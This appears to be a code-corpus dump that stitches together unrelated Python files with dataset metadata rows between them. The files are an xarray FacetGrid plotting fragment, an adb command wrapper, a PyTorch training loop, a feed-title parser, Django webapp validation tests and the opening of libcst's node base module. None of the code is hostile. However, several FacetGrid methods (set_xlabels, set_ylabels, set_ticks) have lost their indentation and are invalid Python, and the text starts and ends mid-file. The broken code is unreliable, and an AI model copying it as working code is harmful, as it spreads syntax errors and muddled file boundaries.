        _, _, hueplt, xlabel, ylabel, huelabel = _infer_line_data(
            darray=self.data.loc[self.name_dicts.flat[0]],
            x=x, y=y, hue=hue)
        self._hue_var = hueplt
        self._hue_label = huelabel
        self._finalize_grid(xlabel, ylabel)
        if add_legend and hueplt is not None and huelabel is not None:
            self.add_legend()
        return self
    def _finalize_grid(self, *axlabels):
        """Finalize the annotations and layout.
        Idempotent: runs only once per grid (guarded by ``self._finalized``).
        """
        if not self._finalized:
            self.set_axis_labels(*axlabels)
            self.set_titles()
            self.fig.tight_layout()
            for ax, namedict in zip(self.axes.flat, self.name_dicts.flat):
                # None marks grid positions with no data; hide those axes.
                if namedict is None:
                    ax.set_visible(False)
            self._finalized = True
    def add_legend(self, **kwargs):
        """Draw a figure-level legend on the right side and widen the
        figure so the legend does not overlap the facets.
        Extra ``kwargs`` are forwarded to ``Figure.legend``.
        """
        figlegend = self.fig.legend(
            handles=self._mappables[-1],
            labels=list(self._hue_var.values),
            title=self._hue_label,
            loc="center right", **kwargs)
        # Draw the plot to set the bounding boxes correctly
        self.fig.draw(self.fig.canvas.get_renderer())
        # Calculate and set the new width of the figure so the legend fits
        legend_width = figlegend.get_window_extent().width / self.fig.dpi
        figure_width = self.fig.get_figwidth()
        self.fig.set_figwidth(figure_width + legend_width)
        # Draw the plot again to get the new transformations
        self.fig.draw(self.fig.canvas.get_renderer())
        # Now calculate how much space we need on the right side
        legend_width = figlegend.get_window_extent().width / self.fig.dpi
        space_needed = legend_width / (figure_width + legend_width) + 0.02
        # margin = .01
        # _space_needed = margin + space_needed
        right = 1 - space_needed
        # Place the subplot axes to give space for the legend
        self.fig.subplots_adjust(right=right)
    def add_colorbar(self, **kwargs):
        """Draw a colorbar shared by all facets.
        Uses the most recent mappable; extra ``kwargs`` go to
        ``Figure.colorbar``.
        """
        kwargs = kwargs.copy()
        if self._cmap_extend is not None:
            kwargs.setdefault('extend', self._cmap_extend)
        if 'label' not in kwargs:
            kwargs.setdefault('label', label_from_attrs(self.data))
        self.cbar = self.fig.colorbar(self._mappables[-1],
                                      ax=list(self.axes.flat),
                                      **kwargs)
        return self
    def set_axis_labels(self, x_var=None, y_var=None):
        """Set axis labels on the left column and bottom row of the grid.
        When the variable is a coordinate of ``self.data``, its attrs-derived
        label is used; otherwise the string is used verbatim.
        """
        if x_var is not None:
            if x_var in self.data.coords:
                self._x_var = x_var
                self.set_xlabels(label_from_attrs(self.data[x_var]))
            else:
                # x_var is a string
                self.set_xlabels(x_var)
        if y_var is not None:
            if y_var in self.data.coords:
                self._y_var = y_var
                self.set_ylabels(label_from_attrs(self.data[y_var]))
            else:
                self.set_ylabels(y_var)
        return self
def set_xlabels(self, label=None, **kwargs):
"""Label the x axis on the bottom row of the grid."""
if label is None:
label = label_from_attrs(self.data[self._x_var])
for ax in self._bottom_axes:
ax.set_xlabel(label, **kwargs)
return self
def set_ylabels(self, label=None, **kwargs):
"""Label the y axis on the left column of the grid."""
if label is None:
label = label_from_attrs(self.data[self._y_var])
for ax in self._left_axes:
ax.set_ylabel(label, **kwargs)
return self
    def set_titles(self, template="{coord} = {value}", maxchar=30,
                   **kwargs):
        """
        Draw titles either above each facet or on the grid margins.

        Parameters
        ----------
        template : string
            Template for plot titles containing {coord} and {value}
        maxchar : int
            Truncate titles at maxchar
        kwargs : keyword args
            additional arguments to matplotlib.text

        Returns
        -------
        self: FacetGrid object
        """
        import matplotlib as mpl

        # Default the title size to the axes label size unless overridden.
        kwargs["size"] = kwargs.pop("size", mpl.rcParams["axes.labelsize"])

        nicetitle = functools.partial(_nicetitle, maxchar=maxchar,
                                      template=template)

        if self._single_group:
            for d, ax in zip(self.name_dicts.flat, self.axes.flat):
                # Only label the ones with data
                if d is not None:
                    coord, value = list(d.items()).pop()
                    # NOTE: ``maxchar`` is already bound via functools.partial
                    # above; passing it again here is redundant but harmless.
                    title = nicetitle(coord, value, maxchar=maxchar)
                    ax.set_title(title, **kwargs)
        else:
            # The row titles on the right edge of the grid, drawn as rotated
            # annotations just outside the axes (x=1.02 in axes fraction).
            for ax, row_name in zip(self.axes[:, -1], self.row_names):
                title = nicetitle(coord=self._row_var, value=row_name,
                                  maxchar=maxchar)
                ax.annotate(title, xy=(1.02, .5), xycoords="axes fraction",
                            rotation=270, ha="left", va="center", **kwargs)

            # The column titles on the top row
            for ax, col_name in zip(self.axes[0, :], self.col_names):
                title = nicetitle(coord=self._col_var, value=col_name,
                                  maxchar=maxchar)
                ax.set_title(title, **kwargs)

        return self
def set_ticks(self, max_xticks=_NTICKS, max_yticks=_NTICKS,
fontsize=_FONTSIZE):
"""
Set and control tick behavior
Parameters
----------
max_xticks, max_yticks : int, optional
Maximum number of labeled ticks to plot on x, y axes
fontsize : string or int
Font size as used by matplotlib text
Returns
-------
self : FacetGrid object
"""
from matplotlib.ticker import MaxNLocator
# Both are necessary
x_major_locator = MaxNLocator(nbins=max_xticks)
y_major_locator = MaxNLocator(nbins=max_yticks)
for ax in self.axes.flat:
ax.xaxis.set_major_locator(x_major_locator)
ax.yaxis.set_major_locator(y_major_locator)
for tick in itertools.chain(ax.xaxis.get_major_ticks(),
ax.yaxis.get_major_ticks()):
tick.label.set_fontsize(fontsize)
return self
    def map(self, func, *args, **kwargs):
        """
        Apply a plotting function to each facet's subset of the data.

        Parameters
        ----------
        func : callable
            A plotting function that takes data and keyword arguments. It
            must plot to the currently active matplotlib Axes and take a
            `color` keyword argument. If faceting on the `hue` dimension,
            it must also take a `label` keyword argument.
        args : strings
            Column names in self.data that identify variables with data to
            plot. The data for each variable is passed to `func` in the
            order the variables are specified in the call.
        kwargs : keyword arguments
            All keyword arguments are passed to the plotting function.

        Returns
        -------
        self : FacetGrid object
        """
        plt = import_matplotlib_pyplot()

        for ax, namedict in zip(self.axes.flat, self.name_dicts.flat):
            # Facets with no data (namedict is None) are skipped entirely.
            if namedict is not None:
                data = self.data.loc[namedict]
                # Make this facet's axes current so ``func`` draws into it.
                plt.sca(ax)
                innerargs = [data[a].values for a in args]
                maybe_mappable = func(*innerargs, **kwargs)
                # TODO: better way to verify that an artist is mappable?
                # https://stackoverflow.com/questions/33023036/is-it-possible-to-detect-if-a-matplotlib-artist-is-a-mappable-suitable-for-use-w#33023522
                # Collected mappables are later used for colorbars/legends.
                if (maybe_mappable and
                        hasattr(maybe_mappable, 'autoscale_None')):
                    self._mappables.append(maybe_mappable)

        # Use the first two variable names as the default axis labels.
        self._finalize_grid(*args[:2])

        return self
| 35.700952 | 152 | 0.582618 |
45d446a91c84c9157024511722464ecff3899ed5 | 4,808 | py | Python | util/adb.py | Michel-14/ALAuto | 18a6e3e82ec5d3818f87697959a9ebd812203197 | [
"WTFPL"
] | 1 | 2020-04-13T03:17:04.000Z | 2020-04-13T03:17:04.000Z | util/adb.py | Michel-14/ALAuto | 18a6e3e82ec5d3818f87697959a9ebd812203197 | [
"WTFPL"
] | 1 | 2020-04-13T16:19:17.000Z | 2020-04-13T16:19:17.000Z | util/adb.py | Michel-14/ALAuto | 18a6e3e82ec5d3818f87697959a9ebd812203197 | [
"WTFPL"
] | 1 | 2020-04-13T15:54:25.000Z | 2020-04-13T15:54:25.000Z | import subprocess
from util.logger import Logger
class Adb(object):
    """Thin wrapper around the ``adb`` command-line tool."""

    # Class-level state shared with the static helpers below.
    legacy = False   # legacy adb mode flag
    service = ''     # serial / host:port of the target device
    transID = ''     # adb transport id of the target device
    tcp = False      # connect over tcp instead of usb

    def init(self):
        """Restart the ADB server from scratch and attach to the device."""
        self.kill_server()
        return self.start_server()

    def enable_legacy(self):
        """Turn on legacy adb usage."""
        self.legacy = True

    def start_server(self):
        """Start the ADB server and make sure the device is attached.

        Returns:
            (boolean): True if everything is ready, False otherwise.
        """
        subprocess.call(['adb', 'start-server'])
        # The server was just killed above, so connect explicitly; the
        # ``tcp`` flag is set by the main script.
        return self.connect_tcp() if self.tcp else self.connect_usb()

    def connect_tcp(self):
        """Connect to ``service`` over tcp and resolve its transport id."""
        output = subprocess.check_output(
            ['adb', 'connect', self.service],
            stderr=subprocess.STDOUT).decode('utf-8')
        if output.startswith('connected') or output.startswith('already'):
            self.assign_serial()
            if (self.transID is not None) and self.transID:
                return True
        Logger.log_error('Failure to assign transport_id.')
        Logger.log_error('Please try updating your ADB installation. Current ADB version:')
        self.print_adb_version()
        return False

    def connect_usb(self):
        """Wait for the usb-attached device and resolve its transport id."""
        self.assign_serial()
        if (self.transID is not None) and self.transID:
            Logger.log_msg('Waiting for device [' + self.service + '] to be authorized...')
            subprocess.call(['adb', '-t', self.transID, 'wait-for-device'])
            Logger.log_msg('Device [' + self.service + '] authorized and connected.')
            return True
        Logger.log_error('Failure to assign transport_id. Is your device connected? Or is "transport_id" not supported in current ADB version? ')
        Logger.log_error('Try updating ADB if "transport_id:" does not exist in the info of your device when running "adb devices -l" in cmd.')
        Logger.log_error('Current ADB version:')
        self.print_adb_version()
        return False

    @staticmethod
    def kill_server():
        """Stop any running ADB server."""
        subprocess.call(['adb', 'kill-server'])

    @staticmethod
    def exec_out(args):
        """Run ``args`` through ``adb exec-out``.

        Args:
            args (string): Command to execute.

        Returns:
            bytes: the command's stdout.
        """
        cmd = ['adb', '-t', Adb.transID, 'exec-out'] + args.split(' ')
        stdout, _ = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()
        return stdout

    @staticmethod
    def push(args):
        """Push a file to the device via ``adb push``.

        Args:
            args (string): Command to execute.
        """
        cmd = ['adb', '-t', Adb.transID, 'push'] + args.split(' ')
        Logger.log_debug(str(cmd))
        subprocess.call(cmd)

    @staticmethod
    def shell(args):
        """Run ``args`` through ``adb shell`` and return its stdout.

        Args:
            args (string): Command to execute.
        """
        cmd = ['adb', '-t', Adb.transID, 'shell'] + args.split(' ')
        Logger.log_debug(str(cmd))
        stdout, _ = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()
        return stdout

    @classmethod
    def assign_serial(cls):
        """Resolve ``cls.transID`` from the `adb devices -l` listing."""
        listing = subprocess.check_output(
            ['adb', 'devices', '-l'],
            stderr=subprocess.STDOUT).decode('utf-8').splitlines()
        cls.sanitize_device_info(listing)
        if not listing:
            Logger.log_error('adb devices -l yielded no lines with "transport_id:"')
        cls.transID = cls.get_serial_trans(cls.service, listing)

    @staticmethod
    def sanitize_device_info(string_list):
        """Drop, in place, every line that lacks a transport id."""
        string_list[:] = [line for line in string_list
                          if 'transport_id:' in line]

    @staticmethod
    def get_serial_trans(device, string_list):
        """Return the transport id for ``device``, or None when absent."""
        for line in string_list:
            if device in line:
                return line[line.index('transport_id:') + 13:]

    @staticmethod
    def print_adb_version():
        """Log every line of `adb --version` output via the error logger."""
        output = subprocess.check_output(
            ['adb', '--version'],
            stderr=subprocess.STDOUT).decode('utf-8').splitlines()
        for line in output:
            Logger.log_error(line)
| 34.589928 | 145 | 0.598586 |
1a6cbd2890d5723dd74141463397f427ffbf3f8d | 5,993 | py | Python | model_training/unet_addnet/trainer.py | ostapViniavskyi/brain_tumor_segmentation | c367155bd8eb3e4f950da824385641d2dc8c063a | [
"MIT"
] | 7 | 2019-12-18T20:07:03.000Z | 2021-04-28T09:19:11.000Z | model_training/unet_addnet/trainer.py | ostapViniavskyi/brain_tumor_segmentation | c367155bd8eb3e4f950da824385641d2dc8c063a | [
"MIT"
] | null | null | null | model_training/unet_addnet/trainer.py | ostapViniavskyi/brain_tumor_segmentation | c367155bd8eb3e4f950da824385641d2dc8c063a | [
"MIT"
] | 1 | 2022-01-17T11:21:50.000Z | 2022-01-17T11:21:50.000Z | import numpy as np
import torch
import torch.optim as optim
import tqdm
import time
import os
from collections import defaultdict
from tensorboardX import SummaryWriter
from model_training.common.losses import get_loss
from model_training.common.metrics import get_metric
class Trainer:
    """Supervised training loop: runs epochs, validates, steps the LR
    scheduler, checkpoints best/last weights and logs to TensorBoard."""

    def __init__(self, model, config, train_dl, val_dl, device):
        """
        Args:
            model: network to train (moved to ``device`` in ``train``).
            config (dict): experiment configuration; must provide
                'num_epochs', 'loss', 'optimizer', 'scheduler', 'metrics'
                and 'log_path'.
            train_dl: training data loader yielding (X, y) batches.
            val_dl: validation data loader yielding (X, y) batches.
            device: torch device for the model and batches.
        """
        self.model = model
        self.config = config
        self.train_dl = train_dl
        self.val_dl = val_dl
        self.device = device
        if not os.path.exists(config["log_path"]):
            os.mkdir(config["log_path"])

    def train(self):
        """Run the full training procedure for ``num_epochs`` epochs."""
        self._init_params()
        for epoch in range(self.epochs):
            train_loss = self._run_epoch(epoch)
            val_loss, metrics = self._validate()
            # ReduceLROnPlateau steps on the monitored validation loss.
            self.scheduler.step(val_loss)
            self._set_checkpoint(val_loss)
            print(f"\nEpoch: {epoch}; train loss = {train_loss}; validation loss = {val_loss}")
            self._write_to_tensorboard(epoch, train_loss, val_loss, metrics)

    def _save_checkpoint(self, file_prefix):
        """Serialize model weights to ``<log_path>/<file_prefix>.h5``."""
        torch.save(
            {
                'model': self.model.state_dict()
            },
            os.path.join(self.log_path, '{}.h5'.format(file_prefix)))

    def _set_checkpoint(self, val_loss):
        """ Saves model weights in the last checkpoint.
        Also, model is saved as the best model if model has the best loss
        """
        if val_loss < self.best_loss:
            self.best_loss = val_loss
            self._save_checkpoint(file_prefix='best')
        self._save_checkpoint(file_prefix='last')

    def _init_params(self):
        """Build loss, optimizer, scheduler, metrics and the log writer."""
        self.epochs = self.config["num_epochs"]
        self.criterion = get_loss(self.config['loss'])
        self.optimizer = self._get_optimizer()
        self.scheduler = self._get_scheduler()
        self.metrics = {metric_name: get_metric(metric_name, device=self.device) for metric_name in
                        self.config["metrics"]}
        # Each run gets its own timestamped log directory.
        self.log_path = os.path.join(self.config['log_path'], f'train-{time.time()}')
        os.mkdir(self.log_path)
        self.writer = SummaryWriter(self.log_path)
        self.best_loss = float("inf")
        self.model.to(self.device)

    def _run_epoch(self, epoch):
        """Train for one epoch and return the mean batch loss."""
        self.model.train()
        losses = []
        lr = self.optimizer.param_groups[0]['lr']
        status_bar = tqdm.tqdm(total=len(self.train_dl))
        status_bar.set_description(f'Epoch {epoch}, lr {lr}')
        for X, y in self.train_dl:
            self.model.zero_grad()
            X, y = X.to(self.device), y.to(self.device)
            y_pred, _ = self.model(X)
            loss = self.criterion(y_pred, y)
            loss.backward()
            self.optimizer.step()
            losses.append(loss.item())
            status_bar.update()
            status_bar.set_postfix(loss=losses[-1])
        status_bar.close()
        return np.mean(losses)

    def _validate(self):
        """Evaluate on the validation set.

        Returns:
            tuple: (mean validation loss, dict of mean metric values).
        """
        self.model.eval()
        losses, metrics = [], defaultdict(list)
        status_bar = tqdm.tqdm(total=len(self.val_dl))
        with torch.no_grad():
            for X, y in self.val_dl:
                X, y = X.to(self.device), y.to(self.device)
                y_pred, _ = self.model(X)
                loss = self.criterion(y_pred, y)
                losses.append(loss.item())
                for metric_name in self.metrics:
                    metrics[metric_name].append(self.metrics[metric_name](y_pred, y))
                status_bar.update()
                status_bar.set_postfix(loss=losses[-1])
        status_bar.close()
        return np.mean(losses), dict(zip(metrics.keys(), map(np.mean, metrics.values())))

    def _get_scheduler(self):
        """ Creates scheduler for a given optimizer from Trainer config

        Returns:
            torch.optim.lr_scheduler._LRScheduler: optimizer scheduler
        """
        scheduler_config = self.config['scheduler']
        if scheduler_config['name'] == 'plateau':
            scheduler = optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,
                                                             mode=scheduler_config['mode'],
                                                             patience=scheduler_config['patience'],
                                                             factor=scheduler_config['factor'],
                                                             min_lr=scheduler_config['min_lr'])
        else:
            raise ValueError(f"Scheduler [{scheduler_config['name']}] not recognized.")
        return scheduler

    def _get_optimizer(self):
        """ Creates model optimizer from Trainer config

        Returns:
            torch.optim.optimizer.Optimizer: model optimizer
        """
        optimizer_config = self.config['optimizer']
        params = self._get_params()
        if optimizer_config['name'] == 'adam':
            optimizer = optim.Adam(params, lr=optimizer_config['lr'],
                                   weight_decay=optimizer_config.get('weight_decay', 0))
        elif optimizer_config['name'] == 'sgd':
            optimizer = optim.SGD(params,
                                  lr=optimizer_config['lr'],
                                  momentum=optimizer_config.get('momentum', 0),
                                  weight_decay=optimizer_config.get('weight_decay', 0))
        else:
            raise ValueError(f"Optimizer [{optimizer_config['name']}] not recognized.")
        return optimizer

    def _write_to_tensorboard(self, epoch, train_loss, val_loss, val_metrics):
        """Log train/validation losses and validation metrics for ``epoch``.

        BUG FIX: the prefixes were previously zipped as
        ``('Validation', 'Train')`` against ``(train_loss, val_loss)``,
        which logged the training loss under 'Validation_Loss' and the
        validation loss under 'Train_Loss'. The pairing is now correct.
        """
        for scalar_prefix, loss in zip(('Train', 'Validation'),
                                       (train_loss, val_loss)):
            self.writer.add_scalar(f'{scalar_prefix}_Loss', loss, epoch)
        for metric_name in val_metrics:
            self.writer.add_scalar(f'Validation_{metric_name}', val_metrics[metric_name], epoch)

    def _get_params(self):
        """Parameters handed to the optimizer (all model parameters)."""
        return self.model.parameters()
8aa2aa527c8b0a2dd0a1e38f623be6bbda666dff | 721 | py | Python | WebMirror/management/rss_parser_funcs/feed_parse_extractVentifrappeWordpressCom.py | fake-name/ReadableWebProxy | ed5c7abe38706acc2684a1e6cd80242a03c5f010 | [
"BSD-3-Clause"
] | 193 | 2016-08-02T22:04:35.000Z | 2022-03-09T20:45:41.000Z | WebMirror/management/rss_parser_funcs/feed_parse_extractVentifrappeWordpressCom.py | fake-name/ReadableWebProxy | ed5c7abe38706acc2684a1e6cd80242a03c5f010 | [
"BSD-3-Clause"
] | 533 | 2016-08-23T20:48:23.000Z | 2022-03-28T15:55:13.000Z | WebMirror/management/rss_parser_funcs/feed_parse_extractVentifrappeWordpressCom.py | rrosajp/ReadableWebProxy | ed5c7abe38706acc2684a1e6cd80242a03c5f010 | [
"BSD-3-Clause"
] | 19 | 2015-08-13T18:01:08.000Z | 2021-07-12T17:13:09.000Z | def extractVentifrappeWordpressCom(item):
'''
Parser for 'ventifrappe.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
titlemap = [
('Doctoring the world Chapter ', 'Doctoring the world', 'translated'),
('Doctoring the world: Chapter ', 'Doctoring the world', 'translated'),
('Master of Dungeon', 'Master of Dungeon', 'oel'),
]
for titlecomponent, name, tl_type in titlemap:
if titlecomponent.lower() in item['title'].lower():
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | 34.333333 | 104 | 0.675451 |
c6c7a51e7c4881e764a8d572e670b3cfa744175f | 8,687 | py | Python | mkt/developers/tests/test_views_validation.py | ngokevin/zamboni | a33dcd489175d8e7ba1c02ee4dabb6cfdc405e69 | [
"BSD-3-Clause"
] | null | null | null | mkt/developers/tests/test_views_validation.py | ngokevin/zamboni | a33dcd489175d8e7ba1c02ee4dabb6cfdc405e69 | [
"BSD-3-Clause"
] | null | null | null | mkt/developers/tests/test_views_validation.py | ngokevin/zamboni | a33dcd489175d8e7ba1c02ee4dabb6cfdc405e69 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import codecs
import collections
import json
import os
import tempfile
from django import forms
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
from test_utils import RequestFactory
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from mkt.developers.views import standalone_hosted_upload, trap_duplicate
from mkt.files.helpers import copyfileobj
from mkt.files.models import FileUpload
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.files.utils import WebAppParser
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BaseWebAppTest
from mkt.users.models import UserProfile
class TestWebApps(amo.tests.TestCase, amo.tests.AMOPaths):
    """Tests for ``WebAppParser`` against hosted and packaged manifests."""

    def setUp(self):
        self.webapp_path = tempfile.mktemp(suffix='.webapp')
        with storage.open(self.webapp_path, 'wb') as f:
            # Open the fixture inside a ``with`` block so the handle is
            # closed; it was previously leaked.
            with open(os.path.join(os.path.dirname(__file__),
                                   'addons', 'mozball.webapp')) as src:
                copyfileobj(src, f)
        self.tmp_files = []
        self.manifest = dict(name=u'Ivan Krsti\u0107', version=u'1.0',
                             description=u'summary',
                             developer=dict(name=u'Dev Namé'))

    def tearDown(self):
        # Remove any temp manifests written by ``webapp``.
        for tmp in self.tmp_files:
            storage.delete(tmp)

    def webapp(self, data=None, contents='', suffix='.webapp'):
        """Write ``data`` (serialized as JSON) or raw ``contents`` to a temp
        manifest file and return its path; cleaned up in ``tearDown``."""
        tmp = tempfile.mktemp(suffix=suffix)
        self.tmp_files.append(tmp)
        with storage.open(tmp, 'wb') as f:
            f.write(json.dumps(data) if data else contents)
        return tmp

    def test_parse(self):
        wp = WebAppParser().parse(self.webapp_path)
        eq_(wp['guid'], None)
        eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
        # UTF-8 byte string decoded to unicode.
        eq_(wp['description']['es'],
            u'\xa1Acci\xf3n abierta emocionante del desarrollo del Web!')
        eq_(wp['description']['it'],
            u'Azione aperta emozionante di sviluppo di fotoricettore!')
        eq_(wp['version'], '1.0')
        eq_(wp['default_locale'], 'en-US')

    def test_parse_packaged(self):
        wp = WebAppParser().parse(self.packaged_app_path('mozball.zip'))
        eq_(wp['guid'], None)
        eq_(wp['name']['en-US'], u'Packaged MozillaBall ょ')
        eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
        eq_(wp['description']['es'],
            u'¡Acción abierta emocionante del desarrollo del Web!')
        eq_(wp['description']['it'],
            u'Azione aperta emozionante di sviluppo di fotoricettore!')
        eq_(wp['version'], '1.0')
        eq_(wp['default_locale'], 'en-US')

    def test_parse_packaged_BOM(self):
        # Manifest files starting with a UTF-8 BOM must still parse.
        wp = WebAppParser().parse(self.packaged_app_path('mozBOM.zip'))
        eq_(wp['guid'], None)
        eq_(wp['name']['en-US'], u'Packaged MozBOM ょ')
        eq_(wp['description']['en-US'], u'Exciting BOM action!')
        eq_(wp['description']['es'], u'¡Acción BOM!')
        eq_(wp['description']['it'], u'Azione BOM!')
        eq_(wp['version'], '1.0')
        eq_(wp['default_locale'], 'en-US')

    def test_no_manifest_at_root(self):
        with self.assertRaises(forms.ValidationError) as exc:
            WebAppParser().parse(
                self.packaged_app_path('no-manifest-at-root.zip'))
        m = exc.exception.messages[0]
        assert m.startswith('The file "manifest.webapp" was not found'), (
            'Unexpected: %s' % m)

    def test_no_locales(self):
        # With no locales block, the description maps to the default locale.
        wp = WebAppParser().parse(self.webapp(dict(name='foo', version='1.0',
                                                   description='description',
                                                   developer=dict(name='bar'))))
        eq_(wp['description']['en-US'], u'description')

    def test_no_description(self):
        wp = WebAppParser().parse(self.webapp(dict(name='foo',
                                                   version='1.0',
                                                   developer=dict(name='bar'))))
        eq_(wp['description'], {})

    def test_syntax_error(self):
        with self.assertRaises(forms.ValidationError) as exc:
            WebAppParser().parse(self.webapp(contents='}]'))
        m = exc.exception.messages[0]
        assert m.startswith('The webapp manifest is not valid JSON.'), (
            'Unexpected: %s' % m)

    def test_utf8_bom(self):
        wm = codecs.BOM_UTF8 + json.dumps(self.manifest, encoding='utf8')
        wp = WebAppParser().parse(self.webapp(contents=wm))
        eq_(wp['version'], '1.0')

    def test_non_ascii(self):
        wm = json.dumps(dict(name=u'まつもとゆきひろ', version='1.0',
                             developer=dict(name=u'まつもとゆきひろ')),
                        encoding='shift-jis')
        wp = WebAppParser().parse(self.webapp(contents=wm))
        eq_(wp['name'], {'en-US': u'まつもとゆきひろ'})
class TestTrapDuplicate(BaseWebAppTest):
    """Tests for duplicate-domain detection on hosted app uploads."""

    def setUp(self):
        super(TestTrapDuplicate, self).setUp()
        # Duplicate detection is behind a waffle switch.
        self.create_switch('webapps-unique-by-domain')
        self.req = RequestFactory().get('/')
        self.req.user = UserProfile.objects.get(pk=999)

    @patch('mkt.developers.views.trap_duplicate')
    def test_trap_duplicate_skipped_on_standalone(self, trap_duplicate_mock):
        # Standalone validation must not run the duplicate check at all.
        self.post()
        standalone_hosted_upload(self.req)
        assert not trap_duplicate_mock.called

    def test_trap_duplicate(self):
        # After an app with this manifest exists, the same URL is flagged.
        self.post_addon()
        standalone_hosted_upload(self.req)
        assert trap_duplicate(self.req, 'http://allizom.org/mozball.webapp')
class TestStandaloneValidation(BaseUploadTest):
    """Tests for the standalone (devhub) app validation pages."""
    fixtures = fixture('user_999')

    def setUp(self):
        super(TestStandaloneValidation, self).setUp()
        assert self.client.login(username='regular@mozilla.com',
                                 password='password')

        # Upload URLs
        self.hosted_upload = reverse(
            'mkt.developers.standalone_hosted_upload')
        self.packaged_upload = reverse(
            'mkt.developers.standalone_packaged_upload')

    def hosted_detail(self, uuid):
        return reverse('mkt.developers.standalone_upload_detail',
                       args=['hosted', uuid])

    def packaged_detail(self, uuid):
        return reverse('mkt.developers.standalone_upload_detail',
                       args=['packaged', uuid])

    def upload_detail(self, uuid):
        return reverse('mkt.developers.upload_detail', args=[uuid])

    def test_context(self):
        res = self.client.get(reverse('mkt.developers.validate_app'))
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(doc('#upload-webapp-url').attr('data-upload-url'),
            self.hosted_upload)
        eq_(doc('#upload-app').attr('data-upload-url'), self.packaged_upload)

    def detail_view(self, url_factory, upload):
        """Shared assertions for the JSON and HTML upload-detail views."""
        res = self.client.get(url_factory(upload.uuid))
        res_json = json.loads(res.content)
        eq_(res_json['url'], url_factory(upload.uuid))
        eq_(res_json['full_report_url'], self.upload_detail(upload.uuid))

        res = self.client.get(self.upload_detail(upload.uuid))
        eq_(res.status_code, 200)
        doc = pq(res.content)
        assert doc('header h1').text().startswith('Validation Results for ')
        suite = doc('#addon-validator-suite')

        # All apps have a `validateurl` value that corresponds to a hosted app.
        eq_(suite.attr('data-validateurl'), self.hosted_detail(upload.uuid))

    @patch('mkt.developers.tasks._fetch_manifest')
    def test_hosted_detail(self, fetch_manifest):
        def update_upload(url, upload):
            # Serve the fixture manifest instead of fetching over the wire.
            with open(os.path.join(os.path.dirname(__file__),
                      'addons', 'mozball.webapp'), 'r') as data:
                return data.read()
        fetch_manifest.side_effect = update_upload

        res = self.client.post(
            self.hosted_upload, {'manifest': 'http://foo.bar/'}, follow=True)
        eq_(res.status_code, 200)

        uuid = json.loads(res.content)['upload']
        upload = FileUpload.objects.get(uuid=uuid)
        eq_(upload.user.pk, 999)
        self.detail_view(self.hosted_detail, upload)

    def test_packaged_detail(self):
        # Open the fixture in a ``with`` block so the handle is closed;
        # it was previously leaked.
        with open(get_image_path('animated.png'), 'rb') as data:
            self.client.post(self.packaged_upload, {'upload': data})
        upload = FileUpload.objects.get(name='animated.png')
        self.detail_view(self.packaged_detail, upload)
| 39.666667 | 81 | 0.620237 |
b01f811f3466a5ad6e740310328ee16156794479 | 17,073 | py | Python | libcst/_nodes/base.py | chrahunt/LibCST | c92bc02d8c167e0f0a27c822f111d5e14f8545ec | [
"Apache-2.0"
] | null | null | null | libcst/_nodes/base.py | chrahunt/LibCST | c92bc02d8c167e0f0a27c822f111d5e14f8545ec | [
"Apache-2.0"
] | null | null | null | libcst/_nodes/base.py | chrahunt/LibCST | c92bc02d8c167e0f0a27c822f111d5e14f8545ec | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from abc import ABC, abstractmethod
from copy import deepcopy
from dataclasses import dataclass, field, fields, replace
from typing import (
TYPE_CHECKING,
Any,
Dict,
List,
MutableMapping,
Sequence,
Type,
TypeVar,
Union,
cast,
)
from libcst._nodes.internal import CodegenState, CodePosition, CodeRange
from libcst._removal_sentinel import RemovalSentinel
from libcst._type_enforce import is_value_of_type
from libcst._types import CSTNodeT
from libcst._visitors import CSTTransformer, CSTVisitor, CSTVisitorT
if TYPE_CHECKING:
from libcst.metadata.base_provider import BaseMetadataProvider # noqa: F401
_T = TypeVar("_T")

# Maps a metadata provider class to the value type it computes.
# FIX: the forward-reference string must match the name imported above under
# TYPE_CHECKING (``BaseMetadataProvider``); it was previously misspelled
# "BaseMetaDataProvider" and could never resolve.
_CSTMetadataMapping = MutableMapping[Type["BaseMetadataProvider[_T]"], _T]

_CSTNodeSelfT = TypeVar("_CSTNodeSelfT", bound="CSTNode")

# Shared empty tuple so childless nodes avoid allocating a new sequence.
_EMPTY_SEQUENCE: Sequence["CSTNode"] = ()
class CSTValidationError(SyntaxError):
    """Raised when a CST node fails its runtime validation checks."""
class CSTCodegenError(SyntaxError):
    """Raised when code generation for a CST node cannot proceed."""
class _ChildrenCollectionVisitor(CSTVisitor):
    """Collects a node's direct children; used by ``CSTNode.children``."""

    def __init__(self) -> None:
        self.children: List[CSTNode] = []

    def on_visit(self, node: "CSTNode") -> bool:
        self.children.append(node)
        return False  # Don't include transitive children
class _ChildrenReplacementTransformer(CSTTransformer):
    """Swaps one child node for another (or a removal sentinel) in a pass."""

    def __init__(
        self, old_node: "CSTNode", new_node: Union["CSTNode", RemovalSentinel]
    ) -> None:
        self.old_node = old_node
        self.new_node = new_node

    def on_visit(self, node: "CSTNode") -> bool:
        # There is no point descending into the subtree we are replacing.
        return node is not self.old_node

    def on_leave(
        self, original_node: "CSTNode", updated_node: "CSTNode"
    ) -> Union["CSTNode", RemovalSentinel]:
        return self.new_node if original_node is self.old_node else updated_node
class _NOOPVisitor(CSTTransformer):
    # A transformer with no overridden callbacks: visiting with it leaves
    # every node unchanged.
    pass
def _pretty_repr(value: object) -> str:
    """Repr helper: non-string sequences get a multi-line rendering."""
    if isinstance(value, Sequence) and not isinstance(value, str):
        return _pretty_repr_sequence(value)
    return repr(value)
